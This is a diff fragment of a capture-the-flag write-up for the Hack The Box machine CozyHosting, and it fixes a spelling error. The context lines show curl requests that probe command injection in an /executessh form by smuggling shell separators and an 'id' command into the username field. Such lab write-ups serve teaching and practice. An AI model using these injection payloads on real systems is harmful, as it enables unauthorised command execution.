pierretallotte/ctf-writeups/htb-cozyhosting/README.md

 $curl 'http://cozyhosting.htb/executessh' -X POST -H 'Content-Type: application/x-www-form-urlencoded' -d 'host=cozyhosting.htb&username=kanderson;' -v 2> >( grep Location )
 < Location: http://cozyhosting.htb/admin?error=ssh: Could not resolve hostname kanderson: Temporary failure in name resolution/bin/bash: line 1: @cozyhosting.htb: command not found
 ```
 This time, we got an ssh error and a bash error.
-It seems that ssh try to connect to `kanderson` which is the username, and try to run the bash command `@cozyhosting.htb` which is the hostname preceeded by an `@`.
+It seems that ssh try to connect to `kanderson` which is the username, and try to run the bash command `@cozyhosting.htb` which is the hostname preceded by an `@`.
 We can suppose that the command that is executed has the following format: `ssh <username>@<hostname>`.
 To check that, let's try to craft the command `ssh kanderson;id;@cozyhosting.htb` in order to get the command `id` executed:
 ```
 $curl 'http://cozyhosting.htb/executessh' -X POST -H 'Content-Type: application/x-www-form-urlencoded' -d 'host=cozyhosting.htb&username=kanderson;id;' -v 2> >( grep Location )
 < Location: http://cozyhosting.htb/admin?error=ssh: Could not resolve hostname kanderson: Temporary failure in name resolution/bin/bash: line 1: @cozyhosting.htb: command not found